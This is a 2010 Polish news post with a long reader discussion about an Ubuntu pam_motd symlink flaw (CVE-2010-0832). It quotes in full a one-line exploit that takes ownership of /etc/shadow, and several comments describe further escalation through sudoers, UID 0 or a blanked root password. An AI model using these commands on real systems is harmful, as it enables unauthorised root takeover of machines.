Trywialnie prosta do wykorzystania dziura w Ubuntu
- Dodano: 8 lipca 2010
- Wprowadził: trasz
- Komentarze: 230
W Ubuntu znajduje się luka, umożliwiająca każdemu użytkownikowi dziecinnie proste przejęcie praw administratora.
Kilka godzin temu na Twitterze Jona Oberheide’a ukazała się informacja o następującej treści:
rm -rf ~/.cache; ln -s /etc/shadow ~/.cache; ssh localhost (trigger pam_motd by re-logging in and you’ll own /etc/shadow) #tweetsploits
Wykorzystując powyższą metodę dowolny użytkownik Ubuntu mający dostęp do shella może przejąć na własność plik /etc/shadow, odpowiadający za przechowywanie informacji służących do uwierzytelniania użytkowników, lub dowolny inny plik w systemie.
Nie wiadomo, od kiedy dziura jest znana “złym ludziom”.
Więcej informacji: http://twitter.com/jonoberheide/status/1...8009527979
Znalazłeś literówkę? Zgłoś ją używając formularza!
Jeśli uważasz, że ten nius jest nieobiektywny, przedstawia nieprawdziwe wydarzenie, jest spamem lub nie spełnia standardów serwisu, napisz raport.
Niusy na podobny temat:
Komentarze są prywatnymi opiniami dodających je osób. Prosimy o zachowanie kultury wypowiedzi. Komentarze obraźliwe oraz obniżające poziom serwisu będą usuwane. Więcej w regulaminie komentowania.
230 komentarzy
Wszystkie autorskie niusy w serwisie publikowane są na licencji Creative Commons Uznanie autorstwa 2.5 Polska.
~wujek_bogdan
Jesteś pewien, że daj dostęp tylko do /etc/shadow? Może /etc/passwd też da się podejrzeć? Lub jeśli mówimy o chamskich i brutalnych hackach, to może wystarczy wrzucić do cache /etc/sudoers i dodać siebie na uprawnieniach ALL(ALL)? Było by zabawniej, zmienić hasło root-a na takie jak się marzy, a nie szarpać się z łamaniem?
A po jaką cholerę Ci /etc/passwd?
pozdr,
fEnIo
Można ustawić swojemu kontu UID0 czyli roota.
/etc/sudoers musi mieć ustawione odpowiednie prawa dostępu, bo inaczej sudo nie będzie działać.
sprawdzilem, szybcy sa bo juz nie dziala
Testowane na Fedorze 12 – nie działa.
News jest o Ubundu.
pr3
Bledy zdarzaja sie wszystkim. Problem w tym przypadku polega na tym, ze ten blad wynika z elementarnego bledu programistycznego – tego typu problemy byly popularne kilkanascie lat temu; wydawalo sie, ze od tamtego czasu programisci douczyli sie o podstawach. Przyklad Ubuntu dowodzi, ze jednak nie.
Drugi problem to review. Zmiany w rzeczach kluczowych dla bezpieczenstwa, takich jak moduly PAM, powinny byc przejrzane przez kogos kompetentnego. Powyzszy problem – a takze pare innych, w rodzaju pamietnej wtopy Debiana z OpenSSL-em – pokazuje, ze ten proces rowniez nawala.
No, ok jest błąd. Ale zdziwiłbym się, gdyby był tylko w łubudubu.
Przecież pam jest używane chyba w większości dystrybucji – no może designerowski owl ma jakieś swoje ustrojstwo.
Nie zdziwiłbym się, gdyby to działało też na innych distrach. Oni raczej nie wrzucają swoich syfów do pam tylko biorą od debiana. Mało prawdopodobne, że to ich wpadka. Siła rażenia może być bardzo duża, bo wielu ludzi zmienia tapetę w łubudubu i sprzedaje jako własny system.
Jak znam życie, to SELinux tu nie pomoże
.
Ja na codzień widzę programistów tworzących sobie pliki /tmp/cośtamcośtam, a jak im nie działa co innego, nie stronią od rozwiązań typu chmod a=rwx.
No ale to programiści aplikacji biznesowych, a nie systemowych, więc im wolno.
Może czegoś nie łapię, ale co jest złego w stworzeniu sobie pliku tymczasowego w /tmp/?
@mgol jeśli nadajesz zawszę tę samą nazwę pliku w /tmp i działasz z uprawnieniami root'a, to ktoś nie mający takich uprawnień może zrobić np. tak: ln -s /etc/shadow /tmp/cośtamcośtam . Po następnym starcie Twojego programu z uprawnieniami root-a /etc/shadow zostanie zniszczone (jeśli /etc jest na systemie plików zamontowanym RW)
Szczegóły jak to ominąć np.
<code>man -s 3 mkstemp</code>
A, OK, mówisz o stałych nazwach. Ja zazwyczaj korzystałem z jakichś losowych sufiksów, upewniając się uprzednio, że dany plik już nie istnieje.
Ale babol! Pojawiła się już nowa wersja bibliotek pama w repozytorium (przynajmniej 9.10)
Version 1.1.0-2ubuntu1.1:
* SECURITY UPDATE: root privilege escalation via symlink following.
– debian/patches-applied/pam_motd-legal-notice: drop privs for work.
– CVE-2010-0832
No nie mow, ze to nie Ubuntu, tylko _znowu_ Debian. Bo jesli tak, to cos jest u nich _strasznie_ nie tak z poziomem kompetencji programistow i z procesem wydawniczym.
jak w każdym linuksie
Zwykle jednak nie az tak.
@trasz ale to jest one day patch, naprawdę nie ma się co martwić
jeden dzień to krótko i pokazało, że proces wyłapywania takich błędów oraz ich naprawiana działa
Fakt pojawienia sie tej dziury pokazal, ze proces wylapywania takich bledow kompletnie nie dziala – bo powinno to zostac wylapane _przed_ wydaniem.
@popo@op.p
Raczej jak w bsd o windozach, czy macosach nie wspominając:
http://www.heise-online.pl/newsticker/news/item/F…
@anonymous: Tyle, ze dziura w Ubuntu to elementarny blad – programista nie zna podstaw bezpiecznego programowania pod Uniksami – a niedawna dziura w BSD to dosyc skomplikowany blad wynikajacy z dziwnej interakcji miedzy dwoma kawalkami kernela.
Żaden Debian.
I przestań _znowu_ tak _strasznie_ zrzędzić.
Odzajączkuj się od Debiana. Jakbyś nie wiedział to Ubuntu bazuje na Debianie i paczki buduje w sposób debianowy, więc w każdej jest katalog debian/, a w nim na przykład patche.
http://www.heise-online.pl/newsticker/news/item/U…
Tam masz to zresztą napisane, że problem dotyczy tylko Ubuntu.
pozdr,
fEnIo
Fakt, Debian mnie zmylil. Co nie zmienia faktu, iz Debian mial juz na swoim koncie kompromitujaca wpadke z bezpieczenstwem.
Jesteś w stanie wskazać system który nigdy nie miał?
@trash
A jaki współczesny system nie miał kompromitującej wpadki?
Błędy się zdarzają…
@Plichu: Wpadki, ktora popelnic moze tylko poczatkujacy programista, i ktora nie przeszlaby przez zaden review? W ciagu ostatnich paru lat cos takiego nei zdarzylo sie ani Solarisowi, ani FreeBSD, ani pozostalym uniksom.
może za słabo szukano
Śmiało można powiedzieć, że popularność wymienionych "Uniksów" jest ułamkiem popularności Ubuntu.
@bobycop: jak to się czasy zmieniają… Sugestie, że na Linuksa jest mało wirusów w porównaniu z Windows z powodu jego znikomej popularności, zwykle linuksiarze z miejsca odrzucali, że to nie przez brak popularności tylko dlatego, że Linux jest bezpieczy by design.
A teraz proszę — popularność ma znaczenie
@bobycob: Popularnosc Ubuntu jest ulamkiem popularnosci OSX-a – a tam tego typu bledu tez nie bylo.
A ile windows miał wpadek z bezpieczeństwem?
@trasz: no, a na CanSecWest Leopard padł w 30s a Ubuntu nie dało się przez 3dni.
Ale fakt- błąd na błędzie, złe założenia, goowniane wykonanie- no patrz, ale działa
Były za to w Windows 7(z infekcją pamięci notatnika).
@Sławek: URL?
@trasz w ciągu kilku ostatnich lat FreeBSD miało lukę że można było przejąć roota, a i solaris miał też coś z ssh tak więc twoja wypowiedz 5 komentarzy wyżej jest nieprawdziwa
OSX w wersji serwerowej jest rzadko spotykany – przynajmniej na naszym kontynencie. Więc znów można powiedzieć, że ilość OSX w tej roli jest ułamkiem instalacji Łubudubu.
Ubuntu w wersji serwerowej jest rzadko spotykane – to system glownie na desktopy, jak OSX. I mimo popularnosci bedacej znikomym odsetkiem popularnosci OSX-a ludzie znajduja w nim tego typu bledy.
i tu się ciśnie, znajdują bo jest co przeglądać
słabo znam OSX (Choć mam do niego dostęp) jednak, czy jesteś w stanie przyjrzeć się skryptom PAM, czy też usługi za to odpowiedzialnej?
Z tego co widze (glownie po "man -k pam"), to OSX uzywa standardowego OpenPAM. Wiec tak, jestem.
W Ubuntu ludzie się przyglądali, przyglądali, przyglądali aż po ośmiu miesiącach znaleźli błąd;)
To chyba wynika z modelu rozwoju – skoro pakiety mają opiekunów, to inni zakładają, że są to osoby kompetentne i nie przeglądają ich zmian. Raz się taki domorosły hakier nauczył używać Valgrinda i naprawił openssl, teraz z kolei jakiś piewca wolności, praw i moralności postanowił każdemu wyświetlić licencję, no i jak wyszło widzimy.
exploit pozwala jedynie na dostęp do /etc/shadow. kolejna kwestia to złamanie zahaszowanych tam haseł. jeśli hasło jest proste/krótkie/słownikowe może się to udać w stosunkowo krótkim czasie, jeśli mamy mocne hasło nie będzie to możliwe do wykonania brute forcem w rozsądnym czasie.
a może da się zmienić hasło (tzn hasza) i otrzymać dostęp do konta roota?
Jesli jestes wlascicielem pliku /etc/shadow, to mozesz go zmodyfikowac, zmieniajac haslo na przyklad na puste.
Niestety, ale to nieprawda. Exploit działa na dowolny plik w systemie: zmieni jego właściciela i grupę na bieżącego usera (uprawnień nie tyka). To może być i plik sudoers.
Możesz w takim wypadku skopiować /etc/shadow, zmienić hasło, by następnie przywrócić stary plik.
Mój błąd:
http://www.heise-online.pl/open/news/item/Ubuntu-…
To jest pikuś – przeczytajcie lepiej to : http://forum.linuxmint.pl/index.php/topic,1660.0….
No ja bym się nieźle wk…wił jak by mi windows zjadł dokumenty przez bład podsystemu graficznego .
To bardziej wyglada na blad uzytkownika, celowe dzialanie zlych ludzi albo pad filesystemu niz cos z grafika.
Argumentacja w stylu: "a u Was biją murzynów" nigdy do mnie nie trafiała.
TO jest pikuś – przeczytajcie raczej to :
http://forum.linuxmint.pl/index.php/topic,1660.0….
Ja bym się nieźle wk..wil jak by mi winodws zjadł dokumenty przez awarię podsystemu grafiki
Tak z ciekawosci, jezeli Ubuntu jest na Debianie to czy ten sam blad dziala pod Debianem lub pod innymi dystrybucjami tez? Czy tylko na Ubuntu? Nie uzywam Linuxa tak wiec nie moge na "szybko" sprawdzic.
Zacznij używać
Ale na Debianie nie ma.
Nie ma na Linuxie programow ktore uzywam:) (np. Yahoo Messenger z obsluga kamery)
Uzywalem Ubuntu przez 2 lata do czasu gdy cos zepsulo sie z partycja nie potrafilem odzyskac swoich plikow. Jeszcze knfigurowanie wszystkiego zajmuje bardzo dlugo czasu lub zajmowalo. Nawet jezeli potrafie skonfigurwac to z pomoca tutoriali i for na temat dystrybucji to jednak czasochlonnosc szukania jest zbyt duza dla mnie lol:)
Mialem jeszcze Debiana i PLD przez kilka lat jako router do neostrady.
Przyznaje, ze uzwanie (gdy wszystko bylo skonfigurowane) bylo przyjemniejsze niz w porownaniu do Windowsa:)
dlatego po udanej instalacji i konfiguracji robi sie obraz partycji z systemem ktory sie pozniej odtwarza i w przypadku windows i linux i cokolwiek innego to wygodna metoda.
Trochę byłby nieaktualny ten obraz, bo ostatnią (i pierwszą) instalację Debiana robiłem 4 lata temu
można sobie robić osobne np. co tydzień. Proces jest raczej bezobsługowy i wcale tak długo nie trwa.
No tak, zabootowanie z zewnetrznego nosnika (nie chcesz chyba robic image'u podmontowanego filesystemu?) i przewalenie kilkuset GB na zewnetrzny dysk jest bezobslugowe i nie trwa, ROTFL. Gdyby Linux mial dzialajace snapshoty i cos w rodzaju zfs send/zfs receive albo chociaz odpowiednik TimeMachine z OSX, wtedy moznaby tak powiedziec.
"kilkuset GB" yyy?
@eee: No wiem, w handlu sa dyski majace ponad 1TB, ale na przyklad ja nadal mam tylko 500GB w laptopie, i spokojnie mi wystarczy.
@trasz – jeżeli Twoje systemy zajmują po kilkaset GB, to współczuję – moje Gentoo mieści się na 25 GBowej partycji, po skompresowaniu przez partimage backup tej partycji zajmuje ~10 GB…
@tomek: Nie oczekujesz chyba, ze bede backupowal system, a nie bede backupowal naprawde istotnych rzeczy, na przyklad mojego $HOME?
A czy może być trywialnie trudna dziura?
Bez paniki. Z tego co wiem to ten błąd nie dotyczy "dowolnego użytkownika" tylko użytkownika który pod ubuntu jest oznaczony jako administrator (co i tak mu daje prawo do zmiany /etc/shadow )
Ciekawe, czemu ma nie dotyczyć. PAM działa z prawami roota, bo wywołuje go /bin/login (lub /usr/bin/sshd). Co miałoby go powstrzymać przed nadpisaniem $HOME/.cache?
W Debianie tego nie ma. Co więc Ubuntu spieprzyło?
trywialnie prosta, autentyczny fakt, masło maślane …
trywialny != łatwy
trywialny: pospolity, prostacki, wulgarny, ordynarny.
trywialny również znaczy łatwy
Za SJP… trywialny
2. «oczywisty i banalnie łatwy»
…jednak łatwy.
@d. Nie widziałeś nigdy w książce zdania "dowód jest trywialny"? To się zawsze odnosiło do prostoty i oczywistości dowodu. W tym przypadku chodzi właśnie o to, bo przecież nie prostacko-wulgarność
Moooment…
Wykorzystując powyższą metodę dowolny lokalny użytkownik Ubuntu
Czyli zdalnie się nie da? No to za przeroszeniem mając fizyczny dostęp do maszyny uzyskanie roota jest banalne bez żadnych dziur.
Nie chodzi o dostep fizyczny, tylko o dostep do shella.
To dlaczego w tekście widnieje użytkownik lokalny? Paskudna jakość tych newsów.
Dowiedz sie w wolnej chwili, czym – ogolnie – rozni sie exploit lokalny od zdalnego. Terminologia powinna ci sie troche rozjasnic
Korzystając z maszyn terminalnowych mógłbyś uzyskać dostęp do serwera na prawach root-a.
Na prawidłowo zabezpieczonym komputerze uzyskanie roota nawet przy fizycznym dostępie do sprzętu jest niemożliwe (pomijam instalację sprzętowych keylogerów albo podmianę klucza UBS i czekanie aż admin sam poda hasło). Ale takie rzeczy to tylko w Linuksie.
Przy fizycznym dostępie, wiele jest możliwe, chociażby wyjęcie dysku i podmontowanie gdziekolwiek indziej, ewentualnie boot z livecd i hulajdusza.
Partycje mam szyfrować?
Polecam.
polecasz ~-50% do wydajności?
@wildenergy: Przy dzisiejszych procesorach spadek wydajnosci nie jest az tak duzy (pierwsza lepsza maszyna potrafi przepchnac ponad 100MB/s w GELI), a szyfrowanie, zwlaszcza w laptopie, to fajna rzecz.
Tu zgodzę się z tr*szem.
Nie zauważyłem żadnego spadku wydajności.
Dane da się czytać/pisać tak samo szybko jak z nieszyfrowanej partycji (testowane).
Nie pamiętam jakie było zużycie CPU przy tych testach, ale przy codziennej pracy nie da się zauważyć. Przy standardzie jakim są 2-rdzeniowe procesory to z resztą nie ma znaczenia.
U mnie gdy mialem dysk wirtualnej maszyny z windowsem na szyfrowanej partycji (host linux), to przy kopiowaniu duzych plikow na windows polaczonym z kopiowaniem plikow na hoscie na drugim szyfrowanym dysku, samo szyfrowanie potrafilo zajac ~70-80% jednego rdzenia. Transfer tez wydawal sie wolniejszy niz w aktualnej konfiguracji, gdzie wirtualne maszyny trzymam na oddzielnym fizycznym dysku na nieszyfrowanym xfs. Procesor nie najgorszy, c2d 2,4GHz. Chociaz przyznam, ze przy normalnej pracy nie czuc szyfrowania. No chyba, ze w tle leci wiekszy update
btw. `dd if=/dev/zero of=zeros` na szyfrowanej partycji powoduje obciazenie szyfrowaniem ~50-60% jednego rdzenia.
Do AES w i7 jest instrukcja i ponoć działa kilka razy szybciej (i.e. test dd + dm-crypt + odpowiedni moduł jądra). Choć nie mam i7 więc nie próbowałem.
Ja mam obecnie szyfrowanie, ale tylko /home . Też nie zauważyłem spadku wydajności.
Wszystkie pozostale systemy maja rownie dobre (Windows z odpowiednim oprogramowaniem) lub lepsze (FreeBSD) rozwiazania szyfrujace – albo caly dysk, albo wybrana czesc. Natomiast teza o fizycznym dostepie jest bzdurna (jak wiekszosc twoich rewelacji, oO) – proponuje wyguglac prezentacje Joanny Rutkowskiej o "Evil Maid Attack".
Co jest w tym bzdurnego?
Jak chcesz się włamać, gdy wszystkie partycje są zaszyfrowane, a /boot jest na pendrive?
Z tego co czytam ten twój atak jest właśnie wymierzony w niezaszyfrowaną partycję /boot, więc nie jest żadnym odkryciem ani niespodziewanym zagrożeniem.
Oczywiście możesz ukraść mi pendrive, spreparować go i niepostrzeżenie odłożyć na miejsce. Możesz też mnie porwać i torturami wymusić wyjawienie hasła
Ale to ma się nijak do realnego naruszenia bezpieczeństwa.
@oO: Boot na pendrive? To moze po prostu wyjmowac twardy dysk i ze soba caly czas nosic? ;->
Nie wiem czego się czepiasz. To popularna metoda.
I, co najważniejsze, działa, jeśli już komuś aż tak zależy na bezpieczeństwie danych.
A dysku się ze sobą nie nosi, bo narażasz go na uszkodzenia
No chyba, że SSD, jeśli potrzebujesz przenosić dużo danych i mieć do nich szybki dostęp.
@oO
Każda teza z "niemożliwe" jest bzdurna- wszystko jest możliwe, zwłaszcza w informatyce, zwłaszcza w linuksie.
Osobiście odradzam instalowanie czegokolwiek na pendrive- niejednokrotnie miałem problemy z odmawianiem posłuszeństwa przy zapisie( a raczej nie zapisywania i nie informowania o tym ) czy gubieniem danych na często używanych pendrive-ach. Pamięci błyskowe mają swoją żywotność zapisu, także w obszarach tablicy partycji i MBR. Czasem po prostu się przegrzewają i wszystko szlag trafia albo nie wszystko tylko kilka sektorów, a zagubiony sektor w binarce to nieprzyjemna sprawa. Pendrive-y i karty doskonale nadają się do przenoszenia danych i ich przechowywania z nakierowaniem na odczyt, ale na system, w kawałkach czy w całości, nie bardzo.
@hez: na /boot rzadko się zapisuje.
http://www.heise-online.pl/newsticker/news/item/U…
Traszowi należą się podziękowania za kolejny dowód na szybkie łatanie dziur w Linuksie
Exploit od kilku tygodni krazyl wsrod "zlych ludzi", wiec nie powiedzialbym, ze takie szybkie.
W niusie widnieje informacja, że:
Natomiast exploit od kilku tygodni krazyl wsrod zlych ludzi.
świetna argumentacja
Exploit na OSX od lat krąży wśród złych ludzi – ani ja tego nie udowodnię, ani ty takiej bzdury nie obalisz.
@bobycob: Zapewne owszem, krazy. Ale czy widziales tu ostatnio jakiegos fanboya twierdzacego, ze dziury w OSX (pomijam juz, ze tak idiotyczne dziury w systemach innych niz Linux generalnie sie nie zdarzaja) sa łatane natychmiast? Bo fanboya mowiacego to w odniesieniu do Ubuntu masz kilka postow powyzej.
Pozwolę sobie odpowiedzieć cytatem: URL?
@trasz: panie Edwardzie. Spokojnie- ja czytam posty i jakoś nie widzę tekstów jakie pan insynuowane. Sam pan nie jest w stanie udowodnić, że ta luka znana była 'złym ludziom' od tygodni. To pana insynuacje i proszę być konsekwentnym- insynuacje u innych są tak samo złe jak te u pana.
Rozumiem emocje, że wreszcie trafiła się perełka w informacjach o dziurze na Linuksa (szkoda, że tylko Ubuntu… no nie) i trzeba pofolgować swoim teoriom o złym założeniom programistycznym, modelowi rozwoju i ogólnie straszliwej jakości kodu w Linuksie. Przecież wreszcie trafiła się taka perełeczka- a to rzadkość, ale przecież to nie ujmuje pańskiej teorii (przepraszam- wiedzy).
Czekam z ciekawością na kolejne tego typu posty. Jakość kodu w Linuksie przecież jest tak tragiczna, że przy takim chaotycznym modelu rozwoju podobnej klasy wpadki powinny być regularnie. Nieprawdaż?
PS.
A rzeczywistość pokazuje, że przy konfrontacji z hakerami to Ubuntu wytrzymało 3 dni, a Leopard odpadł po 30s.
z drugiej strony
Fatalnie wygląda ta "usterka" łubudu jest przedstawiany jako bezpieczna alternatywa dla Windows. Jednak jest to system dostępny za free.
Ciekaw jest, czy takie kwiatki trafiają się w dystrybucjach sprzedawanych za ciężkie pieniądze jak np RedHat albo Suse.
@Reddie: Czego oczekujesz, wywiadu z greyhatem, ktoremu znudzilo sie dotychczasowe zycie?
@bobycob: Dobrze pamietam, ze jakis czas temu ktos sie wlamal do RedHata (firmy, nie dystrybucji) i wykradl klucz uzywany do podpisywania paczek? Taka wtopa nawet Microsoftowi nigdy sie nie zdarzyla.
Dowodu. No bo przecież nie uważasz, że Sławek musi udowadniać istnienie exploita a ty nie, prawda? ;>
oj akurat MS nie jest dobrym przykładem
Mają bogata historię:
takie coś to nawet applowie się nie zdarzyło 
http://hacking.pl/pl/news-1796-Wlamanie_na_serwer…
tak na szybko
podejrzewam, że chodzi ci o ten przypadek:
http://www.idg.pl/news/166151/Wlamanie.na.serwery…
Nie za stary jesteś aby tak kłamać? RedHat != Fedora
ok cofam co powiedziałem – nie jesteś za stary
@Tomasz Woźniak: Jaki sens w tym przypadku mialoby "udowodnienie" ci czegokolwiek? Nie chcesz, nie wierz, twoj problem. Naprawde nie zalezy mi na przekonaniu cie, ze dziur nie szukaja wylacznie ludzie nienaganni moralnie i czysci jak lza.
Co do "trzydziestu sekund", na ktore sie powolujesz – zapomniales wspomniec, ze chodzilo tam o luke w przegladarce, nie w systemie operacyjnym. Coz, jak sie nie ma flasha domyslnie wlaczonego, to sie jest mniej narazonym, taki lajf.
@Reddie: Nie prosilem Sławka o udowodnienie niczego, tylko o podanie URL-a, bo zwyczajnie jestem ciekawy – zwlaszcza, ze exploit "z infekcja pamieci notatnika" nie wyglada specjalnie wiarygodnie, przyznasz.
@bobycob: W sumie mozliwe, ze Fedora. Tak czy inaczej tego rodzaju wtopa nie przydarzyla sie nawet Microsoftowi – kompromitacja hasel betatesterow to jednak zupelnie inna klasa problemu niz wyciek klucza uzywanego do podpisywania oficjalnie dystrybuowanych paczek.
Ja też jestem zwyczajnie ciekawy, bo exploit krążący "od tygodni" o którym nikt nie słyszał nie wygląda specjalnie wiarygodnie.
A, no i posłużę się jeszcze raz tym, co napisałeś w newsie:
Skoro NIE WIADOMO to znaczy, że nie jesteś w stanie stwierdzić, czy znana jest od wczoraj czy od tygodni. Jakim cudem teraz jesteś tego tak pewien? Gdy fakty nie pasują do tezy, to tym gorzej dla faktów? ;>
Bo nius ma byc obiektywny i podparty czyms _publicznie_ znanym.
Jak każda teza, inaczej to tylko twoje wydumki.
@trasz: panie Edwardzie- ja tylko biłem do tego, że z jednej strony piętnował pan nieudowodnione insynuacje, z drugiej sam pan je sieje. Nie chcę aby mnie pan do czegokolwiek przekonywał.
Dowolny błąd jaki jest łatany można określić typem 'tygodniami miał do niego dostęp sztab złych ludzi'. Jako, że taka teza jest nie do udowodnienia, to po co ją siać? Jedyny powód jaki mi przychodzi do głowy to populizm, ale o to pana nie posądzam.
Co do samego włamu na konkursie- Ubunciak też miał Flasha, tylko akurat luka w nim nie działała. Osobiście wyznaje zasadę, że nie ma firmy posiadającej monopol na bezawaryjność, czy tym bardziej na tworzenie kodu bezbłędnie.
Tak na chłopski rozum- ani OSX ani Ubuntu nie mają za priorytet bezpieczeństwa. Jest bardzo ważne, ale w starciu wygoda użytkownika kontra kompromisy bezpieczeństwa, wygrywa u obu właśnie użytkownik. Wpadki w bezpieczeństwem w OSX zdarzają się pewnie rzadziej (model rozwoju i wielkość inwestycji), ale nie uwierzę w teorię o tym że ich nie ma. Nie uwierzę też, że nie ma kodu dostępnego dla złych ludzi tygodniami
Co do pańskiej ideologicznej teorii o złej jakości kodu w Linuksie i ogólnej masie błędów systemowych i projektowych. Wydaje mi się, że postrzega pan wszystko przez pryzmat wizji unixowej- prostych małych kawałków spinanych w wielkie rzeczy. Mały kawałek łatwo udokumentować, zaprojektować i zoptymalizować niż bardziej skomplikowany. Pański problem to niedostrzeganie, że Linux to nie Unix. To podobna wizja i szereg zgodności (jak języki Polski i Rosyjski). Rozwija się jednak inaczej- póki co nadal wybuchowo- czyli silnie nastawiając się na nowości i eksperymenty w każdym kierunku. To nie rozwój koła, ale losowej krzywej zamkniętej, w której zamykana powierzchnia się poszerza, ale nierównomiernie na każdym z promieni. Tego typu wpadki będą się zdarzały- jednak będą wyciągane też wnioski i błędy będą naprawiane.
Pozdrawiam serdecznie. Zaproszenie do Szczecina nadal aktualne ;D
@Tomasz Woźniak: To, ze od kilku tygodni exploit krazyl wsrod "zlych ludzi", to nie teza, tylko stwierdzenie faktu. Jesli nie chcesz wierzyc – masz prawo. Jesli chcesz, mozesz nawet wierzyc, ze jestem wielbladem – niespecjalnie moge udowodnic, ze nie jestem, przynajmniej bez spotkania w realu.
Co do Flasha – milo, ze sobie wyjasnilismy, ze twoj argument o "zdobyciu OSX w ciagu trzydziestu sekund" sprowadzal sie do dziury we Flashu, a nie w systemie operacyjnym.
Co do rozwoju Linuksa – zgadzam sie co do tego, iz developerzy Linuksa kompletnie nie rozumieja idei KISS. Nie zgadzam sie co nowosci i eksperymentow – sorry, ale w Linuksie mozna ich ze swieca szukac; przykladem stagnacji sa chociazby systemy plikow – Linux nadal tkwi w latach dziewiecdziesiatych (ext4 to funkcjonalnie i projektowo cos jak VxFS sprzed pietnastu lat). Wybuchowy rozwoj (a wlasciwie wybuchowy wzrost popularnosci) skonczyl sie kilka lat temu, co widac po statystykach – udzial w rynku serwerow, tak jak udzial w rynku desktopow, od paru stoi w miejscu.
@trasz: oki – jest postęp. Czyli KISS często w Linuksie nie istnieje- sama idea nie jest jakimś panaceum na niesamowitość, ale metodyką pracy, która wcale nie musi działać. Tworzenie oprogramowania mając tą metodykę głęboko w poważaniu, wcale nie musi prowadzić do bałaganu. To tyle na wstępie.
Niemniej jasne jest, że Linux nie zawsze ma podejście Unixowe. Czy to dobrze, czy źle- na dwoje babka wróżyła i różnie to bywa.
Co do rozwoju, to jest pan mocno niesprawiedliwy. Ostanie lata to ogromny rozwój, a system plików o jakim pan wspomina- chciałem zaznaczyć że pański ukochany FreeBSD też sam sobie nowoczesnego system plików nie stworzył. Eksperymenty są podejmowane i realizowane- to, że pan ich nie chce widzieć to pańska sprawa i pańska ideologia. Przykład- chociażby USB3. Mógłbym wymienić kilka technologi, ale skoro pan nie che mnie przekonywać, to tym bardziej ja pana.
Buehehe
Fakty, kochany, mają to do siebie, że są obiektywnie weryfikowalne.
Piszesz o FreeBSD, tak? ;>
@Tomasz Woźniak: Owszem, niezrozumienie idei KISS nie musi prowadzic do balaganu. Co nie zmienia faktu, ze w przypadku Linuksa cos do aktualnego balaganu ewidentnie doprowadzilo.
Co do rozwoju – mozesz podac przyklad tego "ogromnego rozwoju" w ciagu ostatnich kilku lat? Co do FreeBSD – przypomnij mi, kto wysunal teze o ogromnej innowacyjnosci FreeBSD, ktora starasz sie obalic?
Odnosnie USB3 – to owszem, jest eksperyment – ale tworcow sprzetu. Rola Linuksa ogranicza sie do posiadania sterownikow, w ktorych nie ma nic innowacyjnego.
@Reddie: Wiec twoim zdaniem jesli jakas informacja nie jest publicznie dostepna, to nie istnieje. Fajne. Twoja karta kredytowa wie, ze wlasnie zniknales jej PIN? ;->
Ziew, nie mam zamiaru się z tobą bawić w semantykę. Ty wiesz, że nie potrafisz udowodnić tego co piszesz. Ja wiem, że w związku z tym piszesz bzdury. It's that easy.
Ależ Pan trasz trolluje, łoł. Po prostu mistrzu. "Czas łatania" liczy się od upublicznienia/zgłoszenia dziury a nie od czasu kiedy jakiś hakier w swojej piwniczce go znajdzie i powie o tym kolegom w swoim hermetycznym środowisku.
@miecho: nie, to chodzi że wreszcie takie coś się trafiło na Linuksa i można na fali polecieć z po bandzie. Obiektywizm kończy się gdy zaczyna się święta wojna.
@miecho: Czas łatania to wynalazek wymyslony przez linuksiarzy, kiedy poprzednie metody udowadniania wyzszosci nad Windows, czyli liczba znajdywanych dziur, przestaly dzialac na ich korzysc.
@Tomasz Woźniak: Przegladasz czasem LWN? "Cos trafia sie na Linuksa" srednio co tydzien. Natomiast tak idiotyczny blad jak ten tutaj to ewenement, nie tylko w Linuksie.
Tak, Linuksiarze wymyślili interwał między upublicznieniem luki a jej załataniem. Gdyby nie oni, luki łatałyby się natychmiast
Czasami jesteś tak głupi że aż zabawny.
Bo przecież jakie to ma znaczenie czy exploit wiszący na twitterze działa jeden dzień czy do następnego wtorku ;>
Bo przeciez jakie ma znaczenie, czy kolejne dziury pojawiaja sie raz na tydzien, czy raz na rok.
Ma. Ale nie tylko to.
@trasz: panie Edwardzie- nie przeglądam LWN, bo nie jest mi to potrzebne. Orientuję się jednak, że poziom bezpieczeństwa Linuksa jest wystarczający do nazywania go 'bezpiecznym'. Posiadane certyfikaty do użycia w krytycznych systemach też nie wzięły się z niczego. Najważniejsze jest jednak to, że wykryte luki się łata w miarę szybko- oczywiście pan twierdzi inaczej, ale widziałem że niejednokrotnie panu udowadniano, iż racji pan nie miał.
@Tomasz Woźniak: Jak już decydujesz się używać zwrotu "pan", to wypada go pisać z dużej litery.
@Tomasz Woźniak: Wydaje ci sie, ze poziom jest wystarczajacy do nazwania go bezpiecznym, ale nie sledzisz statystyk mowiacych o bezpieczenstwie? Ciekawe.
A co do certyfikatow – problem w tym, ze certyfikaty bezpieczenstwa, ktore ma Linux, zostaly wydane na identycznej zasadzie, jak dawno temu dla Windows NT – przewiduja system, ktory nic nie robi i nie jest skonfigurowany do pracy w sieci. Jest to chwyt marketingowy nie majacy zadnego praktycznego znaczenia, wazny dla advocacy i w kilku zastosowaniach wymagajacych swistka.
@trasz: rozumiem, że emocje i temperatura… ale proszę nie siać FUDu.
Mówię np. o certyfikatach typu EAL, których o ile wiem NT nigdy nie dostał, a Linuksy znajdują się na tych samym poziomie co np. Solaris.
Co do statystyk bezpieczeństwa- ufam opiekunom dystrybucji i ludziom mądrzejszym ode mnie. Pan też najprawdopodobniej nie śledzi statystyk jakie części pana samochodu powodują najwięcej wypadków, co nie przeszkadza panu uważać swoje auto za bezpieczne. Mylę się? Panie Edwardzie- wiem, że uważa pan, iż każdy powinien z satysfakcją czytać o kolejnych błędach przepełnienia bufora mimo iż prawdopodobieństwo włamania tą metodą jest skrajnie niskie. Niestety ludzie mają ciekawsze rzeczy do robienia.
Poziom bezpieczeństwa w Linuksie jest wystarczający. Zresztą obaj wiemy, że nawet Flash na Linuksie jest bezpieczniejszy niż na OSX.
@Tomasz Woźniak: W przypadku EAL "diabel tkwi w szczegolach" – konkretnie w, hm, "deklaracjach", ktorych spelnienie potwierdza certyfikat, i ktore deklaruje sam producent systemu, pomijajac niewygodne z punktu widzenia certyfikacji elementy. Dlatego dostalo je i Windows (http://www.microsoft.com/presspass/press/2005/dec05/12-14CommonCriteriaPR.mspx#Microsoft), i RHEL, i kilka komercyjnych Uniksow.
